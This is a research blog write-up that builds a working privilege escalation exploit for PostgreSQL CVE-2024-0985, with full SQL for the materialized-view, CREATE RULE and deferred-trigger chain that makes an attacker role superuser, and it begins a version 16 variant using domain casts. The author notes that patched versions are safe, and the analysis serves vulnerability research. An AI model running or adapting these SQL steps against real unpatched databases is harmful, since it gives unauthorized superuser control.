Constructing a Postgres Privilege Escalation Exploit


In February 2024, the PostgresSQL Project announced patches for CVE-2024-0985, a vulnerability which allowed an attacker to execute arbitrary SQL using the role of their victim. In particular, an attacker could use the exploit to gain superuser privileges.

I couldn’t find a write-up or proof-of-concept with details beyond the CVE notice, so I decided to see if I could work out a version of attack on my own. In the process, I discovered a way to exploit the vulnerability in version 16, which was previously thought not to be vulnerable1. The fix for v15 and below is included in 16.2 anyway, so if you’re on any of the latest supported versions, you’re safe from this attack.

The version of the attack I initially put together requires a convoluted dance to pull off correctly, but based on hints from the CVE, I think the original researcher likely presented something similar to it. In any case, it took me a lot of trial and error to piece it together, and since I learned a lot along the way, I wrote this article to share some of the discovery process I went through. It includes explanations of relevant PostgreSQL features, code snippets, implementation details about internal functionality, and bits of history on how all these came to be. If you’re just here to see a working exploit, you can jump to the end.


Getting Started

This is the original text of the vulnerability disclosure that piqued my curiosity:

Late privilege drop in REFRESH MATERIALIZED VIEW CONCURRENTLY in PostgreSQL allows an object creator to execute arbitrary SQL functions as the command issuer. The command intends to run SQL functions as the owner of the materialized view, enabling safe refresh of untrusted materialized views. The victim is a superuser or member of one of the attacker’s roles. The attack requires luring the victim into running REFRESH MATERIALIZED VIEW CONCURRENTLY on the attacker’s materialized view. As part of exploiting this vulnerability, the attacker creates functions that use CREATE RULE to convert the internally-built temporary table to a view.

Neat. So all we need to do is:

  1. Construct a materialized view with an evil function call.
  2. Get a superuser to run REFRESH MATERIALIZED VIEW CONCURRENTLY on it.
  3. ???
  4. Profit.

At this point, I’m still fuzzy on the details. I don’t know enough about these commands to see how the parts should fit together. On the bright side, the SQL commands it mentions are a good starting point, so I’ll focus first on their intended use.

A Table with a View

A materialized view (aka matview) is a relation created from a query, similar to a CREATE TABLE .. AS SELECT (CTAS) command. Unlike a regular table, you don’t directly modify it with INSERT, UPDATE, and DELETE. Instead, the database saves your query, and when you issue REFRESH MATERIALIZED VIEW, it’ll rerun the query, build a new instance of the table, and swap the old table with the new one.

Normally, using REFRESH MATERIALIZED VIEW blocks concurrent readers from accessing the table2, but you can use the CONCURRENTLY option to allow SELECTs against the old data while the table gets rebuilt. It’s not really worth getting into it here why you would or wouldn’t want to use this option — for now, just note that in order to use it, the matview needs at least one unique index that only uses column names (no function calls) and targets all rows (no WHERE clauses).

So the basic building block of attack is a matview that does something evil during a concurrent refresh. How do I get to the “doing evil” part?

Since the query associated with the matview can call functions, I can easily make a matview that runs arbitrary code when refreshed. That’s not very interesting on it’s own, since anything I can call during the REFRESH, I could have just called directly anyway. More specifically, Postgres looks at the current_user to decide whether a given action is allowed, so what happens if a superuser refreshes the matview? Can I use their privileges to upgrade my own? What if I write something like this:

-- Setup a non-superuser role and database, then connect as that user.
CREATE ROLE r0 LOGIN ;
CREATE DATABASE rdb OWNER r0 ;
\c rdb r0

-- Use a function to populate a matview.
CREATE FUNCTION pwn() RETURNS INTEGER LANGUAGE plpgsql AS $$ BEGIN
  RAISE NOTICE 'user %, super? %', 
    current_user, current_setting('is_superuser');

  IF current_setting('is_superuser') THEN
    ALTER USER r0 SUPERUSER;
  END IF;

  RETURN 1;
END $$ ;

-- Create a matview with an index so we can do a concurrent refresh.
CREATE MATERIALIZED VIEW mv AS SELECT pwn() AS i;
CREATE UNIQUE INDEX ix_mv ON mv(i);

-- Have a superuser refresh it concurrently.
\c rdb postgres
REFRESH MATERIALIZED VIEW CONCURRENTLY mv;

Running it with psql produces output similar to this:

You are now connected to database "rdb" as user "r0".
CREATE FUNCTION
NOTICE:  user r0, super? off
SELECT 1
CREATE INDEX
You are now connected to database "rdb" as user "postgres".
NOTICE:  user r0, super? on
ERROR:  must be superuser to alter superuser roles or change superuser attribute
CONTEXT:  SQL statement "ALTER USER r0 SUPERUSER"

Interesting. When the function ran, the current_user was the matview’s owner (r0), not the superuser (postgres). Why so? The documentation on functions gives a clue. It says Postgres keeps track of a current_user and a session_user, and it describes their difference like this:

The session_user is normally the user who initiated the current database connection; but superusers can change this setting with SET SESSION AUTHORIZATION. The current_user is the user identifier that is applicable for permission checking. Normally it is equal to the session user, but it can be changed with SET ROLE. It also changes during the execution of functions with the attribute SECURITY DEFINER. In Unix parlance, the session user is the “real user” and the current user is the “effective user”.

Alight, but my function doesn’t use SECURITY DEFINER. It seems Postgres uses this mechanism implicitly in some cases. Let’s put a pin in that for the moment and focus on the earlier bit of that paragraph. It says I can use SET ROLE to change the current_user. I can see is_superuser is on. What if I just change to a superuser role?

CREATE FUNCTION pwn() RETURNS INTEGER LANGUAGE plpgsql AS $$ BEGIN
  RAISE NOTICE 'user %, super? %', 
    current_user, current_setting('is_superuser');

  IF current_setting('is_superuser') THEN
    SET ROLE postgres;
    ALTER USER r0 SUPERUSER;
  END IF;

  RETURN 1;
END $$ ;

The result:

ERROR:  cannot set parameter "role" within security-restricted operation
CONTEXT:  SQL statement "SET ROLE postgres"

Yeah, that would have been too easy. There is clearly something more going on here to protect the caller. What exactly is it that Postgres is doing to block the attack?

Security Sandboxing

Let’s tangent for a moment and talk about some older CVEs:

  • CVE-2020-25695: “Multiple features escape ‘security restricted operation’ sandbox”
  • CVE-2022-1552: “Autovacuum, REINDEX, and others omit ‘security restricted operation’ sandbox”

These both refer to the “security restricted operation” (SRO) sandbox — the same phrase that appears in the error message I get when I tried to use SET ROLE during the REFRESH. The SRO sandbox refers to a bit within the “security context”, an internal set of flags that Postgres uses to decide how to interpret the current_user.

One of the security context bits is called LOCAL_USERID_CHANGE. When set, the system knows it has temporarily changed the current_user, and it rejects SET and RESET commands. When you use SECURITY_DEFINER, this is what prevents escalation. The RESTRICTED_OPERATION bit is much more limiting. When set, the SRO bit restricts you from running commands that can change the session state in a way that persists after your code completes, (things like creating temporary tables or deferring a constraint trigger, among many others3). By abusing these commands, you can essentially trick the caller into running code of your choice.

Digging into the history of the initial development of these mechanisms, we can unpin that thought how our matview function is running as if it set SECURITY_DEFINER. In this 2008 thread from the pgsql-hackers list, Tom Lane discusses the security implications of running index functions as the caller during VACUUM FULL and ANALYZE:

Up to now I think we’ve always thought of SECURITY DEFINER functions as being a mechanism for increasing one’s privilege level. However, in this context we want to use them as a mechanism for decreasing privilege level, and if we want to use them that way then the privilege loss has to be air-tight. The problem there is that so far it’s been possible for a SECURITY DEFINER function to execute SET SESSION AUTHORIZATION or SET ROLE and thereby regain whatever privileges are held at the outermost level. The patch as applied disallows both these operations inside a security-definer context.

[…]

The other issue that ought to be on the TODO radar is that we’ve only plugged the hole for the very limited case of maintenance operations that are likely to be executed by superusers. If user A modifies user B’s table (via INSERT/UPDATE/DELETE), there are a lot of bits of code that are controlled by B but will be executed with A’s permissions; so A must trust B a whole lot. This general issue has been understood for quite some time, I think, but maybe it’s time to make a serious push to solve it. Offhand I can cite the following ways in which B could exploit A’s privileges:

  • triggers
  • functions in indexes
  • functions in CHECK constraints
  • functions in DEFAULT expressions
  • functions in rules (including VIEW definitions)

The CVEs above represent mistakes or omissions in the implementation, allowing exactly that kind of exploit. The 2020 vulnerability was discovered by Etienne Stalmans, who wrote this excellent post covering it. The exploit works by creating a table with an INITIALLY DEFERRED constraint trigger, and then getting a superuser to run a function that INSERTs into the table, enqueuing the trigger. When the superuser’s transaction COMMITs, the trigger function executes, but at that point, it’s executing outside the SRO sandbox, and the current_user has switched back to the caller.

To summarize, changing the current_user prevents an attacker from using the caller’s privileges, the LOCAL_USERID_CHANGE prevents them from simply changing roles, and the SRO bit keeps them from setting things up to run code after the current_user changes back to the caller. All three are required for a superuser to safely execute untrusted code.

I need to find a place in the code where those restrictions are relaxed at a time that I can execute my own code. So how do I find such a place?

Refresh, Before and After

In order to do anything naughty, I need to get around the SRO sandbox. To do that, I’ll need to understand the implementation details. I reckon the sensible thing to do is look up the patch that fixes this issue, see what the author says about it, and compare the code before and after4.

Here’s the commit message for the patch:

The internal commands in REFRESH MATERIALIZED VIEW CONCURRENTLY are correctly executed in SECURITY_RESTRICTED_OPERATION mode, except for creating the temporary “diff” table, because you cannot create temporary tables in SRO mode. But creating the temporary “diff” table is a pretty complex CTAS command that selects from another temporary table created earlier in the command. If you can cajole that CTAS command to execute code defined by the table owner, the table owner can run code with the privileges of the user running the REFRESH command.

The proof-of-concept reported to the security team relied on CREATE RULE to convert the internally-built temp table to a view. That’s not possible since commit b23cd185fd, and I was not able to find a different way to turn the SELECT on the temp table into code execution, so as far as I know this is only exploitable in v15 and below. That’s a fiddly assumption though, so apply this patch to master and all stable versions.

OK, I think I can fill in a little more of the attack:

  1. Construct a materialized view with an evil function call.
  2. Get a superuser to run REFRESH MATERIALIZED VIEW CONCURRENTLY on it.
  3. “Cajole that CTAS” into running attack code.
  4. Profit.

Let’s see the code and examine what the fix changed.

I’m explaining the gist of the original code and the patch. Although I’m including some implementation details that will be relevant later, I’ve intentionally removed irrelevant details and error-checking, and I’m taking some liberties with pseudo-code and formatting to make it easier to grok. If anything looks off, or if you’re looking to fully understand the implementation, you should follow the links to see the actual code.

The primary entry point for the refresh code is ExecRefreshMatView. Most of the code is shared for ordinary and concurrent refreshes. In both cases, it executes the matview’s associated query and stores the results in a “transient” table. The new table will be named pg_temp_{OID of the matview}5, and for a concurrent refresh, it’ll be in the temporary schema. Since this step needs to execute potentially-untrusted user-defined code, it changes the current user to that of the matview’s owner and sets the SECURITY_RESTRICTED_OPERATION bit in the security context.

void ExecRefreshMatView() {
  /* Switch to the owner's userid and enter the SRO sandbox. */
  GetUserIdAndSecContext(&save_userid, &save_sec_context);
  SetUserIdAndSecContext(matview->owner, save_sec_context | SECURITY_RESTRICTED_OPERATION);
  
  /* Create a table to hold the query results. */
  if (concurrent) { 
    dest = make_new_table(matview->oid, temporary_schema);
  } else {
    dest = make_new_table(matview->oid, matview->schema);
  }

  /* Generate the data. */
  refresh_matview_datafill(dest, dataQuery);

  /* Modify the original matview or swap it with the new one. */ 
  if (concurrent) {
    refresh_by_match_merge(matview->oid, dest->oid, matview->owner, save_sec_context);
  } else {
    refresh_by_heap_swap(matview->oid, dest->oid);
  }
  
  /* Restore userid and security context */
  SetUserIdAndSecContext(save_userid, save_sec_context);
}

For a non-concurrent refresh, the refresh_by_heap_swap swaps this new table in place of the old one and reconstructs its indexes. That code path never leaves SRO mode, so we’re not going to discuss it further.

For a concurrent refresh, there’s a lot more work involved. The refresh_by_match_merge needs to find the differences between the existing matview and new temp table, then modify the matview to match temp. To do so, this code dynamically generates and executes SQL. That SQL looks roughly like the following:

1. Do some pre-work to help the planner optimize and check there are no duplicate rows in the new data. This code raises an error if that SELECT query returns anything.

ANALYZE ${tempname};

SELECT newdata.*::${tempname} FROM ${tempname} newdata
    WHERE newdata.* IS NOT NULL AND EXISTS
    (
        SELECT 1 FROM ${tempname} newdata2
            WHERE   newdata2.* IS NOT NULL
            AND     newdata2.* OPERATOR(pg_catalog.*=) newdata.*
            AND     newdata2.ctid OPERATOR(pg_catalog.<>) newdata.ctid
    );

2. Disable SRO. Since it can’t create a temporary table using SQL while in SRO mode, it drops down to just LOCAL_USERID_CHANGE.

SetUserIdAndSecContext(relowner, save_sec_context | SECURITY_LOCAL_USERID_CHANGE);

3. Create the temporary table using CREATE [TEMP] TABLE .. AS SELECT (CTAS). The code here builds up comparisons for the columns named by each unique index and finishes with comparison on the full row.

CREATE TEMP TABLE ${diffname} AS
    SELECT
        mv.ctid AS tid,
        newdata.*::${tempname} AS newdata
    FROM        ${matviewname}  mv
    FULL JOIN   ${tempname}     newdata ON (
        -- ...ANDed together comparisons...
        AND newdata.* OPERATOR(pg_catalog.*=) mv.*
    )
    WHERE newdata.* IS NULL OR mv.* IS NULL
    ORDER BY tid;

4. Resume SRO.

SetUserIdAndSecContext(relowner, save_sec_context | SECURITY_RESTRICTED_OPERATION);

5. Use DELETE and INSERT commands to bring the matview6 up-to-date with the transient table, then clean up the temp tables.

ANALYZE ${diffname};

DELETE FROM ${matviewname} mv
    WHERE ctid OPERATOR(pg_catalog.=) ANY
    (
        SELECT diff.tid FROM ${diffname}
        WHERE
                diff.tid IS NOT NULL
            AND diff.newdata IS NULL
    );

INSERT INTO ${matviewname}
    SELECT (diff.newdata).* FROM ${diffname}
    WHERE tid IS NULL;

DROP TABLE ${diffname}, ${tempname};

The patch alters the logic so that the only action that happens outside the SRO is the CREATE TEMP TABLE. It then resumes SRO, uses ALTER TABLE to add the other columns7, and populates the table using INSERT INTO. The changes amount to something like this:

  -- Disable SRO.
- CREATE TEMP TABLE ${diffname} AS
+ CREATE TEMP TABLE ${diffname} (tid pg_catalog.tid);
+ -- Resume SRO.
+ ALTER TABLE ${diffname} ADD COLUMN newdata ${tempname};
+ INSERT INTO ${diffname}
  SELECT ...
- -- Resume SRO.

The rest of the old and new code is the same.

Now the commit message makes more sense, and the attack is starting to come together. The code drops out of SRO so it can create a temporary table, so if I can get my code to run at that moment, it’ll be less restricted8. The current_user will still match my role, so I won’t be able to ALTER ROLE yet, and the LOCAL_USERID_CHANGE change bit will be set, so I won’t be able to just SET ROLE my way out of it, but the SRO bit won’t be set, and I will be able to defer a trigger function to run later, just like the 2020 attack!

But… how do I run code during a SELECT?

Rule Out Select

The disclosure notice and commit message already gave a suggestion for how to inject my code: CREATE RULE. The rule system is a topic for another day, but the gist is that Postgres uses rules to rewrite a query tree before it plans and executes it. The rule system is exactly what implements views: when a query that target a view, it gets rewritten into one that accesses the base tables instead.

As of version 16, the documentation that explains how views and rules are related will tell you that a view is “very nearly the same as” creating a table with a ON SELECT DO INSTEAD rule, but is quick to point out

you can’t actually write that, because tables are not allowed to have ON SELECT rules

Older versions, however, had a different line:

this is exactly what the CREATE VIEW command does internally

Before version 16, the documentation for CREATE RULE included the following sentence, (emphasis mine):

Presently, ON SELECT rules can only be attached to views. (Attaching one to a table converts the table into a view.) Such a rule must be named "_RETURN", must be an unconditional INSTEAD rule, and must have an action that consists of a single SELECT command. This command defines the visible contents of the view. (The view itself is basically a dummy table with no storage.) It’s best to regard such a rule as an implementation detail.

Ah, ha! So that’s what they were getting at. The REFRESH code creates a temporary table, then runs my matview query to populate it. I can seize that moment to run CREATE RULE, so when the REFRESH code continues, and executes SELECT, it’ll get rewritten via my rule.


Building the Exploit

I need a bit of setup to test whether my REFRESH exploit works. I’ll use the same database and role setup I did in the introduction:

-- Setup a non-superuser role and database.
CREATE ROLE r0 LOGIN ;
CREATE DATABASE rdb OWNER r0;
\c rdb r0

Based on those CVEs above, I’ll use a deferred trigger to give the role superuser rights.

-- Set up the privilege escalation via a deferred trigger.
CREATE FUNCTION pwn() RETURNS trigger AS $$
BEGIN
    IF current_setting('is_superuser') THEN
        RAISE WARNING '-- user % --', current_user;
        ALTER USER r0 SUPERUSER;
    END IF;
    RETURN NEW;
END $$ LANGUAGE plpgsql;

CREATE TABLE t1(i INTEGER);
CREATE CONSTRAINT TRIGGER trig 
    AFTER INSERT ON t1
    INITIALLY DEFERRED
    FOR EACH ROW EXECUTE PROCEDURE pwn();

The goal is that when a superuser runs REFRESH .. CONCURRENTLY, I’ll manage to INSERT INTO t1. I won’t be able to do that from the matview query until I can escape the sandbox, but I can test this trigger directly:

\c rdb postgres
SELECT rolname, rolsuper FROM pg_roles WHERE rolname = 'r0';
INSERT INTO t1 VALUES (1);
SELECT rolname, rolsuper FROM pg_roles WHERE rolname = 'r0';

As expected:

+---------+----------+
| rolname | rolsuper |
+---------+----------+
| r0      | f        |
+---------+----------+

You are now connected to database "rdb" as user "postgres".
WARNING:  -- user postgres --

+---------+----------+
| rolname | rolsuper |
+---------+----------+
| r0      | t        |
+---------+----------+

Finally, I know I’ll need to generate and execute dynamic SQL that targets the transient table, so I’ll create a helper function to construct its name. From the code, I know it is generated as pg_temp_{OID of the matview}. I’m casting first to text, to avoid issues if the matview doesn’t exist yet, then to regclass to make Postgres look up its OID, then finally to oid so I get its numeric representation. It’s not totally necessary, but I’ll schema-qualify it and use format to avoid quoting issues.

-- Get the (expected) name of the target temp table.
CREATE FUNCTION get_target() RETURNS TEXT AS $$
    SELECT format('%I.%I',
      pg_my_temp_schema()::regnamespace,
      'pg_temp_' || 'mv'::text::regclass::oid
    );
$$ LANGUAGE SQL STABLE ;

A Reasonable Attempt

Now then, I’ve got all the pieces; it’s time to put them together.

I’ll create a matview named mv that calls a function conv to convert the transient table to a view, adding a ON SELECT rule to call an attack function that inserts into t1, deferring the trigger.

Easy as pie:

-- Convert the temp table to a view. 
CREATE FUNCTION conv() RETURNS INTEGER AS $$
DECLARE
    target TEXT := get_target(); 
BEGIN
    -- Only run if the table exists. 
    IF to_regclass(target) IS NOT NULL THEN
        EXECUTE format('CREATE RULE "_RETURN" AS ON SELECT TO %s DO INSTEAD SELECT attack() AS i', target);
    END IF;
    RETURN 1; 
END $$ LANGUAGE plpgsql;

-- Defer the trigger function to run on commit. 
CREATE FUNCTION attack() RETURNS INTEGER AS $$
BEGIN
    INSERT INTO t1 VALUES (1);
    RETURN 2;
END $$ LANGUAGE plpgsql;

CREATE MATERIALIZED VIEW mv AS SELECT conv() AS i;
CREATE UNIQUE INDEX ix_mv_i ON mv (i);

Let’s give it a shot:

\c rdb postgres
REFRESH MATERIALIZED VIEW CONCURRENTLY mv;
SELECT rolname, rolsuper FROM pg_roles WHERE rolname = 'r0';

And the moment of truth:

You are now connected to database "rdb" as user "postgres".
    server closed the connection unexpectedly
    This probably means the server terminated abnormally
    before or while processing the request.
fatal: connection to server was lost

Uhh… OK. What happened? Let’s check the logs:

LOG:  server process (PID 18335) was terminated by signal 11: Segmentation fault
DETAIL:  Failed process was running: REFRESH MATERIALIZED VIEW CONCURRENTLY mv;
LOG:  terminating any other active server processes

Bonus Content: SIGSEGV

Although I focused on the part of the code that executes SQL via the Server Programming Interface (SPI), the part that populates the transient table creates a “receiver” struct that it passes to the execution engine. When my query function returned its result, the calls an insert function set on this receiver. It’s basically a wrapper function that delegates the call to something like rel->rd_tableam->tuple_insert.

As a consequence, if during the refresh, I abuse the matview’s query to convert the table to a view, then something along that chain gets set to NULL, and it segfaults and takes the server down with it. Perhaps there’s a way to take advantage of the crash, (maybe grab the temporary table and use it for other purposes?), but this particular bug was fixed in a release later, anyway.

Set That Aside

If my matview function returns a value after I’ve converted the transient table to a view, it’ll segfault, but I can side-step the issue with a set-returning function. In this case, I use RETURN NEXT if I wanted to return a real value, but I’ll just use a plain RETURN so it won’t try to insert anything:

-- Convert the temp table to a view. 
CREATE FUNCTION conv() RETURNS SETOF INTEGER AS $$
DECLARE
    target TEXT := get_target(); 
BEGIN
    -- Only run if the table exists. 
    IF to_regclass(target) IS NOT NULL THEN
        EXECUTE format('CREATE RULE "_RETURN" AS ON SELECT TO %s DO INSTEAD SELECT attack() AS i', target);
    END IF;
    RETURN; 
END $$ LANGUAGE plpgsql;

Am I good to go now?

You are now connected to database "rdb" as user "postgres".
WARNING:  skipping "pg_temp_24588" --- cannot analyze non-tables or special system tables
ERROR:  column newdata2.ctid does not exist
LINE 1: ... newdata2.* OPERATOR(pg_catalog.*=) newdata.* AND newdata2.c...
                                                             ^
QUERY:  SELECT newdata.*::pg_temp_4.pg_temp_24588 FROM pg_temp_4.pg_temp_24588 newdata
        WHERE newdata.* IS NOT NULL AND EXISTS (
            SELECT 1 FROM pg_temp_4.pg_temp_24588 newdata2
            WHERE   newdata2.* IS NOT NULL
                AND newdata2.* OPERATOR(pg_catalog.*=) newdata.*
                AND newdata2.ctid OPERATOR(pg_catalog.<>) newdata.ctid
        )

Not quite. I didn’t expect that WARNING, but it makes sense: it’s coming from that first ANALYZE in the code, and now that pg_temp_xxx is a view, there’s nothing to analyze. Luckily, it’s a warning and not an error, so I’m going to just ignore it.

Unfortunately, there is an error stopping the operation: column newdata2.ctid does not exist. The code is trying to compare ctids, a system column that identifies a row’s physical location. Since views don’t have storage, they don’t have a ctid column. Maybe I can just add one?

CREATE MATERIALIZED VIEW mv AS SELECT conv() AS i, 1 AS ctid;

Nope.

ERROR:  column name "ctid" conflicts with a system column name

Bummer. How about renaming it after converting it to a view?

-- Convert the temp table to a view. 
CREATE FUNCTION conv() RETURNS SETOF INTEGER AS $$
DECLARE
    target TEXT := get_target(); 
BEGIN
    -- Only run during a refresh, not the initial build.
    IF to_regclass(target) IS NOT NULL THEN
      EXECUTE format('CREATE RULE "_RETURN" AS ON SELECT TO %s DO INSTEAD SELECT attack() AS i, 1 AS x', target);
      EXECUTE format('ALTER TABLE %s RENAME COLUMN x TO ctid', target);
    END IF;
    RETURN; 
END $$ LANGUAGE plpgsql;

CREATE MATERIALIZED VIEW mv AS SELECT conv() AS i, 1 AS x;
CREATE UNIQUE INDEX ix_mv_i ON mv (i);

That works, but I’m immediately met with a new error:

ERROR:  cannot fire deferred trigger within security-restricted operation
CONTEXT:  SQL statement "INSERT INTO t1 VALUES (1)"
PL/pgSQL function attack() line 2 at SQL statement
SQL statement "SELECT newdata.*::pg_temp_3.pg_temp_24669
    FROM pg_temp_3.pg_temp_24669 newdata
    WHERE newdata.* IS NOT NULL AND EXISTS (
        SELECT 1 FROM pg_temp_3.pg_temp_24669 newdata2
            WHERE newdata2.* IS NOT NULL
            AND newdata2.* OPERATOR(pg_catalog.*=) newdata.*
            AND newdata2.ctid OPERATOR(pg_catalog.<>) newdata.ctid
    )"

This is coming from that initial error-checking step. It SELECTs from the temp table table (twice, in fact, due to the inner SELECT), so it also triggers my attack function. That’s still inside the SRO context, hence the error. I can think of a bunch of work-arounds, but maybe the laziest is to just catch the exception and ignore it:

-- Defer the trigger function to run on commit. 
CREATE FUNCTION attack() RETURNS INTEGER AS $$
BEGIN
    BEGIN 
        INSERT INTO t1 VALUES (1);
    EXCEPTION WHEN OTHERS THEN -- do nothing
    END;
    RETURN 2;
END $$ LANGUAGE plpgsql;

Argh… another error!

ERROR:  "pg_temp_24692" is not a table
HINT:  Use DROP VIEW to remove a view.
CONTEXT:  SQL statement "DROP TABLE pg_temp_4.pg_temp_24692_2, pg_temp_4.pg_temp_24692"

This time, it’s the DROP statement at the end of the function. Again, that table-to-view conversion is getting in the way.

Another Name for a View

I need an actual table with the expected name for DROP to work. I don’t think there’s a way to convert the view back into a table (the table-to-view conversion is a hack9, after all), but since I now have a way to create objects in the temporary schema, I can just create a new table for it to drop.

But then there’s another problem: I can’t create a table with that name, since the view is using it. If I try to just DROP the view, I’ll get an error because the diff table’s columns depend on the temp view’s rowtype. If I try to DROP VIEW .. CASCADE to get around that, I’ll get a different error, because obviously both the table and the view are being used by the active query.

But I don’t really need to drop the view; I just need it out of the way so I can create the table. I can just rename the view to something arbitrary, then create a table with the right name10.

-- Defer the trigger function to run on commit and make a new table.
CREATE FUNCTION attack() RETURNS INTEGER AS $$
DECLARE
  target TEXT := get_target();
BEGIN
    BEGIN 
        INSERT INTO t1 VALUES (1);
        EXECUTE format('ALTER VIEW %s RENAME TO remove_later', target);
        EXECUTE format('CREATE TEMP TABLE %s()', target);
    EXCEPTION WHEN OTHERS THEN -- do nothing
    END;
    RETURN 2;
END $$ LANGUAGE plpgsql;

Though it’s not strictly necessary, I’ll be polite and clean up after myself by dropping the view from the deferred function call:

-- Set up the privilege escalation via a deferred trigger.
CREATE FUNCTION pwn() RETURNS trigger AS $$
BEGIN
    IF current_setting('is_superuser') THEN
        RAISE WARNING '-- user % --', current_user;
        ALTER USER r0 SUPERUSER;
    END IF;
    DROP VIEW IF EXISTS remove_later;
    RETURN NEW;
END $$ LANGUAGE plpgsql;

CREATE TABLE t1(i INTEGER);
CREATE CONSTRAINT TRIGGER trig 
    AFTER INSERT ON t1
    INITIALLY DEFERRED
    FOR EACH ROW EXECUTE PROCEDURE pwn();

And there it is.

You are now connected to database "rdb" as user "postgres".
WARNING:  skipping "pg_temp_24863" --- cannot analyze non-tables or special system tables
WARNING:  -- user postgres --
REFRESH MATERIALIZED VIEW
+---------+----------+
| rolname | rolsuper |
+---------+----------+
| r0      | t        |
+---------+----------+

Woot!

While I can’t be certain exactly what the proof-of-concept sent to the security team looked like, I suspect it looked similar. You can see the full code for this exploit below, but I’m still not satisfied with that “fiddly assumption”. While making my way through this, there was a bit of code that caught my eye, and might provide another path.

Casting Off the <16 Restrictions

The exploit so far doesn’t work in version 16 because I can’t use CREATE RULE to convert the table into a view. From everything above, I know the CTAS is my only opportunity for shenanigans, so I need a different way to get that query to transfer control to a function I wrote.

The only other way I can think to sneak in a function call is to exploit some aspect of Postgres’s extensibility. The query doesn’t include any explicit function calls, but it is generating a bunch of equality comparisons of the form newdata.col = mv.col. Postgres lets you define new types and new operators, so maybe I can use this to get it to call my function.

If I create matview with indexes on types I define, the generated SQL looks something like this:

    newdata.b                       OPERATOR(pg_catalog.=)  mv.b                        -- base types
AND newdata.r::pg_catalog.anyrange  OPERATOR(pg_catalog.=)  mv.r::pg_catalog.anyrange   -- range type
AND newdata.c::pg_catalog.record    OPERATOR(pg_catalog.=)  mv.c::pg_catalog.record     -- composite type
AND newdata.e::pg_catalog.anyenum   OPERATOR(pg_catalog.=)  mv.e::pg_catalog.anyenum    -- enum type
AND newdata.d::pg_catalog.int8      OPERATOR(pg_catalog.=)  mv.d::pg_catalog.int8       -- domain type

Interesting. I see it generated a bunch of schema-qualified casts and references to equality operators. Can I influence it to choose a different equality operator? How does the code determine which operator function to use?

Well, when you define an index, it’ll have an associated operator class aka opclass, which determines which operator the index actually uses. Normally the index uses a sensible default opclass based on the data type, but you can choose one explicitly. Different opclasses can be grouped into an opfamily, which records information about relationships between them, in part to enable certain planner optimizations.

This complexity means the part of the code that generates comparisons goes through a lot of trouble to find the operator associated with each indexed column. This is going to get even further into the weeds, but bear with me for a minute. Here’s a stripped-down version of the relevant code, highlighting the portion the finds the operator:

TupleDesc     tupdesc = matviewRel->rd_att;
bool foundUniqueIndex = false;

/* Iterate over each index on the matview */
foreach(indexoidscan, RelationGetIndexList(matviewRel))
{
  Oid      indexoid = lfirst_oid(indexoidscan);
  Relation indexRel = index_open(indexoid, RowExclusiveLock);

  if (is_usable_unique_index(indexRel))
  {
    /* Get a list of opclasses used by each indexed column. */
    Datum indclassDatum = SysCacheGetAttr(INDEXRELID, indexRel->rd_indextuple, Anum_pg_index_indclass, &isnull);
    oidvector *indclass = (oidvector *) DatumGetPointer(indclassDatum);

    /* Iterate over the columns used by this index. */
    Form_pg_index indexStruct = indexRel->rd_index;
    int           indnkeyatts = indexStruct->indnkeyatts;
    for (i = 0; i < indnkeyatts; i++)
    {
      /* Look up the table column this index column represents. */
      int             attnum = indexStruct->indkey.values[i];
      Form_pg_attribute attr = TupleDescAttr(tupdesc, attnum - 1);
      Oid           attrtype = attr->atttypid;

      /* Get the equality operator associated with column i. */
      Oid             opclass = indclass->values[i];
      HeapTuple        cla_ht = SearchSysCache1(CLAOID, ObjectIdGetDatum(opclass));
      Form_pg_opclass cla_tup = (Form_pg_opclass) GETSTRUCT(cla_ht);
      Oid            opfamily = cla_tup->opcfamily;
      Oid           opcintype = cla_tup->opcintype;
      Oid                  op = get_opfamily_member(
                                  opfamily, opcintype, opcintype, BTEqualStrategyNumber);

      /* Construct the equality clause. */
      if (foundUniqueIndex)
        appendStringInfoString(&querybuf, " AND ");

      const char *leftop  = quote_qualified_identifier("newdata", NameStr(attr->attname));
      const char *rightop = quote_qualified_identifier("mv", NameStr(attr->attname));
      generate_operator_clause(&querybuf, leftop, attrtype, op, rightop, attrtype);

      foundUniqueIndex = true;
    }
  }
}

If it’s easier to make sense of, here’s a SQL function that’s mostly-equivalent to the highlighted portion:

-- Return the OID of the BTree equality operator for a given opclass OID. 
CREATE OR REPLACE FUNCTION get_operator(opclass oid) RETURNS oid AS $$
SELECT amopopr AS operator_oid 
FROM
    pg_opclass opc,
    pg_amop    amop 
WHERE
        opc.oid = $1
    AND amop.amopfamily      = opc.opcfamily
    AND amop.amoplefttype    = opc.opcintype
    AND amop.amoprighttype   = opc.opcintype
    AND amop.amopstrategy    = 3   -- BTEqualStrategyNumber
    AND amop.amopmethod      = 403 -- BTREE_AM_OID
    ;
$$ LANGUAGE SQL STABLE ;

In other words, it looks up the opclass for the column, then searches within its opfamily for a btree equality operator with matching types. And this is all happening by OID, so the choice of operator seems pretty well set by the time the REFRESH is running, having been assigned when the index was created. So in order to get my operator into the opclass, I’ll need to either create a new operator class, which requires superuser privileges, or alter an existing one, which requires owning the opclass, but all the default ones are owned by the bootstrap superuser, so it seems like this idea is dead11.

OK, but since the code is casting from my types to those pg_catalog types, can I just write my own CAST function? The function responsible for emitting the casts and schema qualifications is generate_operator_clause. It emits casts whenever the operand type differs from the operator, which is why the indexes on base types don’t involve casts, but my custom types do.

Initially, the CAST idea looks dead, too: I can’t write a CAST function involving anyrange, record, or anyenum, because it turns out those are all “pseudo-types”, and Postgres won’t let me write casts to or from them. The domain type looks promising, since an int8 is definitely not a pseudo-type, but although I can create a CAST from or to a DOMAIN type, it’ll result in a WARNING informing me that the cast will be ignored.

But… have another look at the bit generating the actual clause:

leftop  = quote_qualified_identifier("newdata", NameStr(attr->attname));
rightop = quote_qualified_identifier("mv", NameStr(attr->attname));
generate_operator_clause(&querybuf, leftop, attrtype, op, rightop, attrtype);

Notice that it passes the same variables attrtype and attname, both taken from the definition it found on the index attached to the original matview. The code expects the columns of the temp table to match the ones on the matview, since it just created it that way. I can modify those columns on the temp table before this code runs, breaking that assumption.

If I create a matview with a column based on a domain type, I know this code will pass that name and type to generate_operator_clause, and it will emit an explicit cast to the base type — on both sides of the operator. If I can change that type of the temp table’s column to something else, I can write a cast function between the domain’s base type and that type, and it’ll run as a consequence of the explicit casts!

There are still a couple bits to work out, though. First, in order to write a CAST function at all, I need to own at least one of the types involved. Since I obviously won’t own the base type that will be the target of the cast, I’ll need a second custom type. That’s an easy issue, since an enum will work just fine.

